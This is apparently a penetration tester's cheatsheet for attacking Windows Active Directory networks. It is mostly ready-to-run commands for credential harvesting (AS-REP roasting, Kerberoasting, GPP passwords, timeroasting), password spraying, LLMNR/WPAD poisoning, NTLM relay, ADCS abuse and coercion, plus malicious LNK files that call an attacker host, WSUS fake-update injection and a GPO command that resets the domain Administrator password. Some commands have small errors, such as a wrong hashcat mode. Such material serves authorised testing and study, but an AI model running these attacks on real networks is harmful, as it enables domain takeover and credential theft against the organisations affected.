- Internal Network Penetration Testing
- Recon
- Unauthenticated enumeration
- Unauthenticated User enumeration
- First foothold
- Authenticated enumeration
- Domain policy using PowerView
- Getting password policy
- MISC Enumeration commands
- Get Net session
- Review SMB Share rights
- Active Directory user and computer account description
- Resetting expired passwords remotely
- PASSWD_NOT_REQD
- Machine Account Quota
- LAPS / LAPS bypass
- Admin Count
- Checking GPP passwords
- Checking GPP autologin
- Checking share
- Print spooler service
- Local admin brute force
- Pywerview recon tool
- Recon/Enumeration using BloodHound
- Expanding BloodHound
- Exploitation
- Identifying Quick Wins
- adPeas
- Password spray
- LNK Files
- Potatoes Attacks
- RPC Misc
- Kerberoasting
- Kerberos Bronze Bit
- Abusing Vulnerable GPO
- Abusing MS-SQL Service
- Relay attacks
- Drop the MIC CVE-2019-1040
- Exploiting ACL over GPO
- Insecure LDAP: LDAPS / Signing / Channel Binding
- Unencrypted Protocols in use
- SYSVOL / GPP
- LLMNR / NBT-NS / mDNS
- WPAD
- ACL / DACL Exploitation
- MachineAccountQuota (MAQ)
- Protected Users
- PAC
- ProxyLogon
- ProxyShell
- ProxyNotShell
- ZeroLogon
- PrintNightmare
- Petitpotam
- samAccountName spoofing
- MiTM - IPv6 + Relay
- Responder + Relay
- WSUS Exploitation
- LDAP Pass Back
- SMTP Pass Back
- Kerberos attacks
- Active Directory exploitation
- Lateral movement
- wmiexec
- smbexec
- psexec
- atexec
- comexec
- Persistence
- Post-Exploitation
- Misc : AD Audit
- WDigest
- Passwords stored in LSA (LSA Storage)
- Abusing leaked handles to dump LSASS memory
- LM password storage
- Storing passwords using reversible encryption
- Inactive domain accounts
- Privileged users with password reset overdue
- Users with non-expiring passwords
- Service account within privileged groups
- AdminCount on regular users
- Data-Exfiltration
- Cracking Hashes
- Reporting / Collaborative
- Defenses
- Resources
- Steve Syfuhs blog
- Red Team Cheatsheet
- OCD - AD Mind Map
- PetitPotam and ADCS
- Active Directory Exploitation cheatsheet
- Attacking Active Directory
- Kerberos Delegation
- Exceptional blog posts regarding Windows Authentication/Credentials/RDP
- Windows Logon Types
- Windows Name Pipes
- COM / DCOM
- PowerShell Without PowerShell
- To do
whoami
systeminfo
hostname
whoami /priv
net users
net localgroup
findstr /spin "password"*.*
nslookup .
gpresult /R
set
echo %envar% (CMD)
$env:envar (PowerShell)
Get-WmiObject Win32_ComputerSystem
klist
klist tgt
PowerShelll port scan
PS C:\Users\lutzenfried> 0..65535 | % {echo ((New-object Net.Sockets.TcpClient).Connect("192.168.2.155",$_)) "Port $_ is open!"} 2> $null```
AD search GUI Copy dsquery.dll from C:\Windows\System32
rundll32 dsquery.dll,OpenqueryWindow
nmcli dev show eth0
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domainName>
nslookup -type=SRV _ldap._tcp.dc._msdcs.company.local
--> Require list of possible usernames:
- Non-existent account :
KDC_ERR_C_PRINCIPAL_UNKNOWN
- A locked or disabled account :
KDC_ERR_CLIENT_REVOKED
- A valid account :
KDC_ERR_PREAUTH_REQUIRED
Use the DsrGetDcNameEx2,CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.
- https://github.com/sensepost/UserEnum
- https://sensepost.com/blog/2018/a-new-look-at-null-sessions-and-user-enumeration/
NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. Its usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network.
NAC can be setup using multiple measures:
- Filtering of MAC addresses
- Authentication with username & password
- Authentication with certificates
- Fingerprinting
- Host checks
Sometimes trying different mac address such as MacOS device, Switch/Routers, Vmware VM can give you access or redirect you to specific VLAN without restriction.
-
VMWARE VM : 00-0C-29-00-4B-3F
-
Apple : F8:FF:C2:23:32:43
-
https://www.thehacker.recipes/physical/networking/network-access-control
Using crackmapexec to test for password equal to username on domain contoso.com
for word in $(cat users.txt); do crackmapexec smb 10.10.0.10 -u $word -p $word -d contoso.com; done
- smbclient
- smbmap
crackmapexec smb all_ips.txt | grep -a "SMBv1:True" | cut -d " " -f 10
crackmapexec smb all_ips.txt | grep -a "signing:False" | cut -d " " -f 10
crackmapexec smb all_ips.txt | egrep -a "Windows 6.1|Server 2008|Server 2003|Windows 7|Server \(R\) 2008"
rdp-sec-check is a Perl script to enumerate the different security settings of an remote destktop service (AKA Terminal Services)
sudo cpan
cpan[1]> install Encoding::BER
rdp-sec-check.pl 10.0.0.93
rpcclient -U '' -N 10.10.0.10 -c "querygroupmem 0x200" | cut -d '[' -f 2 | cut -d ']' -f 1
During the initial authentication stage, a user requests a Ticket Granting Ticket (TGT) from the KDC in the form of a AS-REQ packet. If the account exists, the KDC will return a TGT encrypted with the account’s credentials, meaning that only a valid user or machine possessing the valid credentials is able to decrypt the ticket
When a TGT request is made, the user must, by default, authenticate to the KDC in order for it to respond. Sometimes, this prior authentication is not requested for some accounts, allowing an attacker to abuse this configuration.
This configuration allows retrieving TGT encrypted with user's credential for users that have Do not require Kerberos preauthentication property selected:
python3 GetNPUsers.py COMPANY.LOCAL/ -usersfile /home/user/users.txt -request -dc-ip 192.168.0.10 -format hashcat
Rubeus.exe asreproast /domain:COMPANY.LOCAL /dc:192.168.0.10 /format:hashcat /outfile:asrep-roast.hashes
hashcat -m 18200 'asrep-roast.hashes' -a 0 ./wordlists/rockyou.txt
Google Project Zero undercover some issue with RC4 and Kerberos authentication.
If a user have Do not require Kerberos preauthentication property there is no more the need to crack the encrypted TGT.
python3 CVE-2022-33679.py evilcorp.local/vulnasrepuser dc-2016.evilcorp.local -dc-ip 192.168.2.60
export KRB5CCNAME=vulnasrepuser_dc-2016.evilcorp.local.ccache
crackmapexec smb dc-2016.evilcorp.local -k
nltest /domain_trusts
nltest /trusted_domains
nltest /primary
nltest /sc_query:<domain>
nltest /dclist:<domain>
nltest /dsgetsite
nltest /whowill:<domain> <user>
Get-DomainPolicy
(Get-DomainPolicy)."System Access"
Get domain password policy using ActiveDirectory module. (RSAT)
Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, State
Get-ADDefaultDomainPasswordPolicy
Get all domain fined grained password policy
Get-ADFinedGrainedPasswordPolicy -Filter *
Get password policy for specific user
Get-ADUserResultantPasswordPolicy -Identity john.doe
Recursive search for Domain Admins members
dsquery group -name "Domain Admins" | dsget group -expand -members
Get-NetComputer | Get-NetSession
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user
Using crackmapexec to get active directory user description
crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M get-desc-users
--> It is also extremely important to check for computer account description, as computer account are just AD object with description attribute.
If PASSWD_NOTREQD user-Account-Control Attribute Value bit is set then No password is required.
- First collect the information from the domain controller:
python ldapdomaindump.py -u example.com\\john -p pass123 -d ';' 10.100.20.1
- Once the dumping is done, get the list of users with the PASSWD_NOTREQD flag using the following command:
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
Reset password of users who have PASSWD_NOTREQD flag set and have never set a password:
Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView
Identify machine account quota domain attribute:
crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXXX:XXXXXXX -M MAQ --kdcHost corp.company.local
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
Retrieving LAPS passwords using Crackmapexec
crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXX:XXXXX -M laps --kdcHost corp.company.local
crackmapexec ldap company.com -u 'jdoe' -p 'Pass1234' -d company.com --admin-count
- https://pentestlab.blog/tag/gpp/ Using crackmapexec GPP module
crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M gpp_password
Using Impackets Get-GPPPassword.py
python3 Get-GPPPassword.py company.com/jdoe:Pass1234@10.10.0.10
Using Metasploit module
use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.0.10
msf auxiliary(smb_enum_gpp) > set smbuser jdoe
msf auxiliary(smb_enum_gpp) > set smbpass Pass1234
msf auxiliary(smb_enum_gpp) > exploit
crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M gpp_autologin
Checking share access rights with domain user
crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com --shares
Complete review of network share permissions.
--> Powerhuntshare can be run from domain or non domain joined machine.
Running Powerhuntshare from domain joined machine.
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test
Checking if print spooler service is enable using impacket RPCDUMP or crackmapexec (used RPCDUMP but can be used to scan on large range)
python3 rpcdump.py company.com/jdoe:Pass1234@10.10.0.10 | grep 'MS-RPRN\|MS-PAR'
crackmapexec smb rangeIP.txt -u jdoe -p Pass1234 -d company.com -M spooler | grep Spooler
- https://github.com/InfosecMatter/Minimalistic-offensive-security-tools/blob/master/localbrute.ps1 (a améliorer)
PowerView's functionalities in Python, using the wonderful impacket library.
python pywerview.py get-netuser -w company.local -u jdoe --dc-ip 192.168.0.10 --username jdoe
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
- https://github.com/hausec/Bloodhound-Custom-Queries
- https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
- https://www.trustedsec.com/blog/expanding-the-hound-introducing-plaintext-field-to-compromised-accounts/
- https://neo4j.com/docs/api/python-driver/current/
- Tomcat
- JavaRMI
- WebLogic
- Jboss
nmap -p 8080,1098,1099,1050,8000,8888,8008,37471,40259,9010,7001 -iL ips.txt -oN tomcat_rmi_jboss.txt -sV
Spraying 3 password attempt for each user every 15 minutes without attempting password=username
spray.sh -smb 192.168.0.10 users.txt seasons.txt 3 15 corp.company.local NOUSERUSER
Spraying 3 password attempts for each user every 15 minutes, attempting password=username and light variations. Stops after 3 or 4 accounts locked out.
python smbspray.py -u users.txt -p passwords.txt -d corp.company.local -l 15 -a 3 -ip DC_IP --user_pw
If you get access to a share we can create a malicious .LNK file. This .LNK file will includes a refernece to the attacker computers. You can after choose to Relay the NetNTLM hash or crack it.
- https://github.com/Plazmaz/LNKUp Use --execute to specify a command to run when the shortcut is double clicked
lnkup.py --host attackerIP --type ntlm --output out.lnk --execute "shutdown /s"
Using PowerShell
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@file.txt"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "LNK file"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
https://shenaniganslabs.io/files/impacket-ghostpotato.zip (Security patch in 2019 CVE-2019-1384)
https://github.com/antonioCoco/RemotePotato0/ (October 2022 patched)
https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505 (Patched in Windows 10 1809)
https://github.com/antonioCoco/JuicyPotatoNG
https://pentestlab.blog/2017/04/13/hot-potato/ (2016 patch, ex MS16-075)
https://www.pentestpartners.com/security-blog/sweetpotato-service-to-system/
user@host # rpcclient -U supportAccount //192.168.0.100
[...] authenticate using the supportAccount password which needs to be modified
rpcclient $> setuserinfo2 supportAccount 23 SuperNewPassword22
--> Note : If package passing-the-hash is installed on attacker machine, you can even do this with just a NTLM hash. (Flag : --pw-nt-hash)
while read x; do echo $x; rpcclient -U “DOMAIN/$x%PasswOrd123” -c “getusername;quit” 192.168.0.110; done < ./userlist.txt
Using bash script:
#/bin/bash
for u in 'cat dom_users.txt'
do echo -n "[*] user: $u" && rpcclient -U "$u%password" -c "getusername;quit" 10.10.10.192
done
Service Principal Names (SPN's) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).
The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts.
GetUserSPNs.py -request -dc-ip 192.168.1.10 COMPANY.LOCAL/jdoe:PasswordJdoe123 -outputfile hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
--> To protect against this attack, we must avoid having SPN on user accounts, in favor of machine accounts.
--> If it is necessary, we should use Microsoft’s Managed Service Accounts (MSA) feature, ensuring that the account password is robust and changed regularly and automatically
https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-overview/ https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-theory/ https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-attack/
\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"
- https://www.offsec-journey.com/post/attacking-ms-sql-servers
- https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
. ./PowerUPSQL.ps1
Get-SQLInstanceLocal -Verbose
(Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.20" -Query 'select * from master..sysservers').customquery
Import-Module .\powercat.ps1 powercat -l -v -p 443 -t 10000
Insecure LDAP traffic can exposed clients to multiple vulnerabilities and exploitation path such as:
- Unencrypted LDAP (LDAPS) : Credential and authentication interception (port TCP-UDP/389)
- LDAP Signing disable : LDAP Relay attack (such as SMB Relay but using LDAP)
- LDAP Channel Binding :
Domain controllers and clients are in constant exchange and use the LDAP protocol, which communicates via port 389 (TCP and UDP).
In case a customer use LDAP (389) instead of LDAPS (636) you will be able to intercept authentication and credentials.
Why LDAPS is not deployed everywhere:
- Not all devices are compatible with it (Old telephone systems or legacy applications)
- Small
Note: If SSL is used you can try to make MITM offering a false certificate, if the user accepts it, you are able to Downgrade the authentication method and see the credentials again.
LDAP signing adds a digital signature to the connection. It ensures the authenticity and integrity of the transmitted data. This means that the recipient can verify the sender and determine whether the data has been manipulated along the way.
In case LDAP signing is not enable it is possible to relay a valid LDAP session using ntlmrelayx for example. The LDAP relay attack will give you the ability to perform multiple action such as :
- Dumping LDAP information (ActiveDirectory users/groups/computers information)
- In case the relayed session is from a Domain Admins user you will be able to directly persiste and create a new Domain Admins user.
Validate LDAP signing is not enforced
crackmapexec ldap domain_controllers.txt -u jdoe -p Password123 -M ldap-signing
Channel binding is the act of binding the transport layer and application layer together. In the case of LDAP channel binding, the TLS tunnel and the LDAP application layer are being tied together. When these two layers are tied together it creates a unique fingerprint for the LDAP communication. Any interception of the LDAP communications cannot be re-used as this would require establishing a new TLS tunnel which would invalidate the LDAP communication’s unique fingerprint.
python3 LdapRelayScan.py -dc-ip 192.168.0.10 -u jdoe -p Password123
Bypassing with StartTLS to add a computer for example, using a recent version of ntlmrelayx tool
ntlmrelayx.py -t ldap://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 8080
sudo nmap -p 389,21,20,80,25,110,143,23 192.169.0.1/24 --open -oN unencrypted_protocols_in_use
Port 25
Port 143
Port 110
Port 80
Port 23
Port 21
LDAPS uses its own distinct network port to connect clients and servers. The default port for LDAP is port 389, but LDAPS uses port 636 and establishes TLS/SSL upon connecting with a client.
From Windows client perspective
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
The PowerSploit function Get-GPPPassword is most useful for Group Policy Preference exploitation.
From Linux client
use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit
use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml, Drives.xml
crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_pasword
Searches the domain controller for registry.xml to find autologon information and returns the username and password.
crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_autologin
Breadth-first search algorithm to recursively find .xml extension files within SYSVOL.
Get-GPPPassword.py company.local/jdoe:Password123@192.168.0.10'
gpp-decrypt <encrypted cpassword>
Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network.
It is possible to directly relay NetNTLM has to SMB/LDAP/HTTP and DNS session over a victim. If the victim has SMB and/or LDAP signing activated try to relay on other protocols than SMB or LDAP.
Poisoning LLMNR/NetBios-NS response
python3 Responder.py -I eth0 -wbF
Relay over smb to 192.168.0.10, with smb2 support, socks enable, interactive mode and dumping the NetNTLM relayed hash in option
sudo ntlmrelayx.py -t 192.168.0.10 -i -socks -smb2support -debug --output-file ./netntlm.hashes.relay
- Relay to Exchange (patched since February 2019)
https://github.com/dirkjanm/privexchange/
- Relay to SCCM
Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network, download the wpad.dat, Proxy Auto-Config (PAC) file.
A WPAD server provides client proxy settings via a particular URL:
--> When a machine has these protocols enabled, if the local network DNS is not able to resolve the name, the machine will ask to all hosts of the network.
Using Responder we can poison DNS, DHCP, LLMNR and NBT-NS traffic to redirect clients to a malicious WPAD Server.
responder -I eth0 -wFb
--> Backdooring using Responder and WPAD attack Modify Responder configuration file
; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = On
--> Create a specific web page for error or use the default one.
--> Create an implant to be downloaded by the client. By default the error message indicate this URL : http://isaProxysrv/ProxyClient.exe
--> Patch by Microsoft (MS16-077): Location of WPAD file is no longer requested via broadcast protocols bnut only via DNS.
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#forcechangepassword
- https://github.com/ShutdownRepo/The-Hacker-Recipes/tree/master/ad/movement/dacl
- https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
- https://docs.microsoft.com/en-us/windows/win32/adschema/r-user-force-change-password If we have ExtendedRight on User-Force-Change-Password object type, we can reset the user's password without knowing their current password.
Returns the ACLs associated with jdoe user in DOMAIN.local domain and resolve GUIDs to their display names
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "DOMAIN.local\jdoe"}
. .\PowerView.ps1
Set-DomainUserPassword -Identity User -Verbose
Using rpcclient
rpcclient -U jdoe 10.10.10.192
setuserinfo2 victimUser 23 'Pass123!'
(Domain level Windows Server 2016) Bypass rights restrictions on common atributes (ex: RBCD attack) of user and computer accounts
- NTLM relay:
ntlmrelayx.py -t ldap://adhost.domain.com --shadow-credentials --shadow-target WIN-SCCM$ --cert-outfile-path win-sccm_creds --no-dump -no-da --no-acl --no-validate-privs
https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials
- https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-is-useful-sometimes/
- https://github.com/Kevin-Robertson/Powermad
MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain
Various tools exist which can create a machine account from the command line or from an implant such as StandIn, SharpMad and PowerMad.
-
Machine accounts created through MAQ are placed into the Domain Computers group --> In situations where the Domain Computers group has been granted extra privilege, it’s important to remember that this privilege also extends to unprivileged users through MAQ.
-
The creator account is granted write access to some machine account object attributes. Normally, this includes the following attributes:
- AccountDisabled
- description
- displayName
- DnsHostName
- ServicePrincipalName
- userParameters
- userAccountControl
- msDS-AdditionalDnsHostName
- msDS-AllowedToActOnBehalfOfOtherIdentity
- samAccountName
-
The machine account itself has write access to some of its own attributes. The list includes the msDS-SupportedEncryptionTypes attribute which can have an impact on the negotiated Kerberos encryption method.
-
The samAccountName can be changed to anything that doesn’t match a samAccountName already present in a domain. --> Interestingly, the samAccountName can even end in a space which permits mimicking any existing domain account. You can strip the $ character also.
Well-known SID/RID: S-1-5-21-<domain>-525
This group was introduced in Windows Server 2012 R2 domain controllers.
Get-ADGroupMember -Identity "Protected Users"
for group in $(rpcclient -U '' -N 10.10.0.10 -c enumdomgroups | grep Protected | cut -d '[' -f 3 | cut -d ']' -f 1); do rpcclient -U '' -N 10.10.0.10 -c "querygroupmem $group"; done
Protected users is a Security Group which aims to create additional protection against compromise of credential regarding its members, such as the followings:
- Kerberos protocol will not use the weaker DES or RC4 encryption types in the preauthentication process
- Credential delegation (CredSSP) will not cache the user's plain text credentials
- Windows Digest will not cache the user's plain text credentials even when Windows Digest is enabled (From windows 8.1 and Server 2012 R2)
- The user’s account cannot be delegated with Kerberos constrained or unconstrained delegation
- Members of this group cannot use NTLM
- Kerberos ticket-granting tickets (TGTs) lifetime = 4 hours
Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M zerologon
https://github.com/outflanknl/PrintNightmare (MS-PAR method)
PetitPotam, publicly disclosed by French security researcher Lionel Gilles, is comparable to the PrintSpooler bug but utilizes the MS-EFSRPC API to coerce authentication rather than MS-RPRN.
Check to validate host is vulnerable to petitpotam
crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M petitpotam
https://github.com/topotam/PetitPotam
https://github.com/p0dalirius/Coercer (several methods)
https://github.com/ShutdownRepo/ShadowCoerce (MS-FSRVP method)
https://github.com/Wh04m1001/DFSCoerce (MS-DFSNM method)
https://github.com/leechristensen/SpoolSample (MS-RPRN RPC method)
https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc (improved implementation of SpoolSample)
-
Windows prefers IPv6 by default.
-
DHCPv6 is constantly broadcasting to the entire network.
-
https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
SMB Relay
LDAP Relay
Tools: ntlmrelayx, multirelay
SMB Relay
LDAP Relay
In case of WSUS being deployed without SSL/TLS encrypted communications, we can perform a man-in-the-middle attack and inject a fake update.
- Can only deliver binaries signed by Microsoft (PSExec, BGinfo with VB script)
- Need to perform ARP Spoofing or tamper with the system's proxy settings (if possible)
--> WSUS Server can be found based on the server hostname (e.g. server-wsus-01) or based on open ports (8530,8531)
Tools
- https://github.com/pimps/wsuxploit
- https://github.com/GoSecure/pywsus
- https://github.com/ctxis/wsuspect-proxy/
python pywsus.py -H 172.16.205.21 -p 8530 -e PsExec64.exe -c ‘/accepteula /s cmd.exe /c “echo wsus.poc > C:\\poc.txt”‘
Windows Update is a Windows service, wuauclt.exe which run periodically to check for updates.
Registry keys exist that govern various details such:
- Update server's location
- Update frequency
- Privileged Escalation of unprivileged users
--> Communication: Client --> Windows Update Server : HTTP(S) / SOAP XML web service.
WSUS or Windows Software Update Services is the enterprise variant of Windows update.
- Updates fetched from local server instead of Microsoft Server
- Updates must be approved by administrator before being pushed out
Check WSUS HTTP Misconfiguration:
- Check Registry on WSUS client machines to validate TLS usage
HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\
WUServer = http://wsus-server.local:8530
- Check if the computer will use WUServer
HKLMT\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
UseWUServer = 1
LDAP pass back attack target LDAP credentials used by the MFP within its network configuration (check for default credentials on printers).
The attacker tricks a device to connect to a rogue server to disclose the stored network credentials or hashes while the device trying to authenticate to the server.
2 methods:
- nc listener
- Rogue LDAP server
Sometimes the domain account used within theses printers are service accounts with interesting privileges and I also found domain admins account credentials being used. In any case if a domain account is used it can give you a first foothold within the domain from an unauthenticated perspective.
- https://github.com/RobinMeis/MITMsmtp --> Similar to LDAP Pass back with SMTP protocol this time.
Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.
- https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf
- https://github.com/SecuraBV/Timeroast
On domain controller (up to Windows Server 2019) if you create a computer account (Workstation1$) with CMD Line (net computer) or through the GUI box and check Assign this computer account as a pre-Windows 2000 Computer.
--> This will set the computer account password to default password that matches the first 14 characters of their computer name, lowercase and without a dollar sign.
python3 timeroast.py 192.168.2.60 -o ntp_hashes
1002:$sntp-ms$3axxxxxxx3$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx038
1116:$sntp-ms$11xxxxxxx2$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx73e
1119:$sntp-ms$e9xxxxxxxb$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxcfa
1117:$sntp-ms$30xxxxxxx5$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx2d3
1127:$sntp-ms$71xxxxxxx7$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx663
1128:$sntp-ms$51xxxxxxxd$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx9f6
1129:$sntp-ms$08xxxxxxxf$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxdd4
1131:$sntp-ms$d5xxxxxxxc$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx41e
1137:$sntp-ms$13xxxxxxxe$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxb80
1138:$sntp-ms$9exxxxxxx0$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx767
1139:$sntp-ms$bbxxxxxxxc$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxea2
1140:$sntp-ms$9axxxxxxx5$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxe01
Cracking NTP Hashes
- hashcat/hashcat#3629
- https://github.com/hashcat/hashcat/commit/5446570a4fe7fbadc0bb481f41616e76833da735
Format 31300 (SNTP-MS) available to hashcat to crack the NTP hashes.
hashcat -a 0 -m 3130 ntp_hashes ./wordlists/rockyou.txt
Find PKI Enrollment Services in Active Directory and Certificate Templates Names
crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M adcs
certutil.exe -config - -ping
Enumerate misconfigured templates
-
Grey box
- https://github.com/ly4k/Certipy
- After enumeration, check the TXT output for a quick analysis
-
Black box
ntlmrelayx.py -t ldap://server.corp.ca --dump-adcs
Abusing with NTLM relay to AD CS HTTP endpoint
- Obtain base64 certificate from User authentication template
ntlmrelayx.py -6 -t http://CA_server/certsrv/certfnsh.asp -smb2support --adcs --template "User" -debug
- Obtain PFX certificate. If relaying from Domain Controller, use
-template
switch
certipy relay -target 'http://CA.domain.com' -template DomainController
- https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ad-cs-abuse
- https://github.com/PKISolutions/PSPKI
- https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/
-
Swiss knife for certificates, using a PFX file
-
Request a TGT using a PFX,PEM file or base64 encoded blob:
-
Feature for DCSYNC rights delegation
-
Local Privilege escalation through TGT
Requirements:
- RCE or shell on a machine
- Rubeus tool uploaded on the machine
- Execute commands as service/virtual account
- Macthine template is enabled in AD CS environment
Rubeus.exe tgtdeleg /nowrap
Common NTLM relay attacks to perform RBCD use the basic HTTP to LDAP flow.
Coercing computer NTLM authentication and relaying to LDAP involves the SMB to LDAP flow that does not work. The solution is to coerce NTLM authenticaton over HTP (ex: service Webdav) and relay it to LDAP(S) server.
Coercing to Webdav, with credentials:
Check if Webdav is enabled on the target:
cme smb 192.168.10.12 -u snovvcrash -p 'Passw0rd!' -d megacorp.local -M webdav
Webdav is running under service "WebClient" and is not installed by default on Windows Server. If you cannot enable it and you have write permissions on a SMB share of the target:
cme smb 192.168.10.12 -u snovvcrash -p 'Passw0rd!' -d megacorp.local -M drop-sc
Add DNS entry for Responder:
python dnstool.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' --record 'Responder' --action add --data @IP_Responder @IP_LDAP_server
Trigger coercion to Webdav
python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' Responder@80/test.txt Target.megacorp.local
python3 PetitPotam.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' Responder@80/test Target.megacorp.local
- https://mayfly277.github.io/posts/GOADv2-pwning-part13/
- https://twitter.com/tifkin_/status/1418855927575302144/photo/1
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate
Coercing to HTTP without Webdav service
If you have a Webshell or can execute OS command (ex: OS command injection, xp_cmdshell) on the target, run the following command:
powershell iwr http://IP_address_Responder -UseDefaultCredentials
- https://pentestlab.blog/2022/02/01/machine-accounts/
- https://secarma.com/using-machine-account-passwords-during-an-engagement/
Every computer joined to Active Directory (AD) has an associated computer account in AD. A computer account in AD is a security principal (same as user accounts and security groups) and as such has a number of attributes that are the same as those found on user accounts including a Security IDentifier (SID), memberOf, lastlogondate, passwordlastset, etc.
- Check the group membership for a machine account, sometime the machine account is member of elevated group or Domain Admins
Get-ADComputer -Filter * -Properties MemberOf | ? {$_.MemberOf}
net group "domain admins" /domain
Converting machine account Hex value to NTLM hash:
import hashlib,binascii hexpass = "e6 5f 92..."
hexpass = hexpass.replace(" ","")
passwd = hexpass.decode("hex")
hash = hashlib.new('md4', passwd).digest()
print binascii.hexlify(hash)
- https://medium.com/r3d-buck3t/play-with-hashes-over-pass-the-hash-attack-2030b900562d
